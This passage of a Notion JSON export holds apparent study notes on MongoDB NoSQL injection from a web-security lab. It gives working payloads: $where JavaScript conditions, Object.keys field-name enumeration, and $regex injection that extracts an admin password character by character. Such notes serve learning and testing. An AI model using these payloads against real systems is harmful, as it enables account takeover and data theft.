checks","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8043-ada3-cea56fceec4f","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Instead of guessing exact characters, you can test for patterns:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Instead of guessing exact characters, you can test for patterns:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8046-9b6c-c812486d4746","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password.match(/\\d/) || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password.match(/\\d/) || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-8064-8ec6-df575571e3c1","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8013-9ecf-f2a3c86be23d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password.match(/\\\\d/) || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password.match(/\\\\d/) || 'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8099-b46a-c74465935a80","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Confirms whether password contains ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Confirms whether password contains ","href":null},{"type":"text","text":{"content":"any digits","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"any digits","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8043-9a99-e57a57b97031","parent":{"type":"block_id","block_id":"251dc9c5-3059-8010-afa9-dee76789f701"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Can also test letters, symbols, etc. using regex.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Can also test letters, symbols, etc. using regex.","href":null}],"color":"default"},"archived":false}]}]},{"object":"block","id":"251dc9c5-3059-80a5-9dbb-ef1893eda550","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-16T13:09:00.000Z","last_edited_time":"2025-08-16T13:18:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Exploiting NoSQL operator injection to extract data","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Exploiting NoSQL operator injection to extract data","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8028-a928-ddae891bae42","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a5-9dbb-ef1893eda550"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Even if the original query doesn’t normally allow JavaScript execution, you might inject special operators yourself to test if the database evaluates them. If it does, you can start extracting data.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Even if the original query doesn’t normally allow JavaScript execution, you might inject special operators yourself to test if the database evaluates them. If it does, you can start extracting data.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8013-aa20-f9968267b190","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a5-9dbb-ef1893eda550"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Injecting operators in MongoDB","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Injecting operators in MongoDB","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8006-bb59-df92c5ce10e7","parent":{"type":"block_id","block_id":"251dc9c5-3059-8013-aa20-f9968267b190"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"A vulnerable app might take login data as JSON like:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"A vulnerable app might take login data as JSON like:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8068-9680-eafa59a0350d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8013-aa20-f9968267b190"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"wiener\",\"password\":\"peter\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"wiener\",\"password\":\"peter\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-80be-9e48-fd0d6aaeb1ca","parent":{"type":"block_id","block_id":"251dc9c5-3059-8013-aa20-f9968267b190"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"To check if MongoDB is evaluating JavaScript via ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"To check if MongoDB is evaluating JavaScript via ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":", add a ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", add a ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" field:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" field:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8011-b543-e67d8c52352c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8013-aa20-f9968267b190"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"wiener\",\"password\":\"peter\", \"$where\":\"0\"} // condition FALSE\n{\"username\":\"wiener\",\"password\":\"peter\", \"$where\":\"1\"} // condition TRUE","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"wiener\",\"password\":\"peter\", \"$where\":\"0\"} // condition FALSE\n{\"username\":\"wiener\",\"password\":\"peter\", \"$where\":\"1\"} // condition TRUE","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-808e-ae92-cc4302d82b42","parent":{"type":"block_id","block_id":"251dc9c5-3059-8013-aa20-f9968267b190"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the app responds differently to these two requests, the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the app responds differently to these two requests, the ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" JavaScript is being run — meaning you have an injection point.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" JavaScript is being run — meaning you have an injection point.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a5-9dbb-ef1893eda550"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Extracting field names","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Extracting field names","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-807c-b6eb-d05124e387bc","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" works, you can enumerate database field names using JavaScript.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" works, you can enumerate database field names using JavaScript.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8033-b86b-d38cf7766dfa","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Example payload:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8091-b192-ec371bab1ca4","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"\"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"\"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-8040-a398-f635ff6b1bde","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Object.keys(this)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"Object.keys(this)","href":null},{"type":"text","text":{"content":" → gets all field names of the current document.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → gets all field names of the current document.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8036-a58b-fee64481eb50","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"[0]","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"[0]","href":null},{"type":"text","text":{"content":" → picks the first field name.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → picks the first field name.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8010-8446-c02790315f47","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":".match('^.{0}a.*')","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":".match('^.{0}a.*')","href":null},{"type":"text","text":{"content":" → checks if that field name starts with ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → checks if that field name starts with ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":" at position 0.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" at position 0.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8034-ab8a-ce358c30f4c1","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a7-9adc-f8bc9141b1fb"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"By adjusting the regex, you can reveal each character of the field name one by one.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"By adjusting the regex, you can reveal each character of the field name one by one.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8028-8950-ef9db96adabd","parent":{"type":"block_id","block_id":"251dc9c5-3059-80a5-9dbb-ef1893eda550"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Exfiltrating data using non-JavaScript operators","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Exfiltrating data using non-JavaScript operators","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80db-aa7c-c4a158600535","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Even if you ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Even if you ","href":null},{"type":"text","text":{"content":"can’t","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"can’t","href":null},{"type":"text","text":{"content":" run JavaScript, you may still leak data using operators like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" run JavaScript, you may still leak data using operators like ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b4-8867-f114d6596042","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Suppose the normal login is:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Suppose the normal login is:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80cb-a106-c65b6d58ef54","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"myuser\",\"password\":\"mypass\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"myuser\",\"password\":\"mypass\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f1-ab5a-c1a9f5cb583c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"First, check if ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"First, check if ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":" works:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" works:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8071-b9ce-d3cfda69332d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^.*\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^.*\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-8008-9feb-d0689f6a2c6e","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If this returns differently than an invalid password, ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If this returns differently than an invalid password, ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":" is being used to match passwords.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is being used to match passwords.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8059-9e93-e97df8a89d6b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You can then guess the password character by character.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You can then guess the password character by character.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8023-8fef-c33f24635aa0","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"For example, to test if the password starts with ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"For example, to test if the password starts with ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":":","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":":","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8015-a84f-d765459d5b31","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^a*\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^a*\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-804c-b0b7-db79be51cb91","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the response indicates success, you know the password begins with ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the response indicates success, you know the password begins with 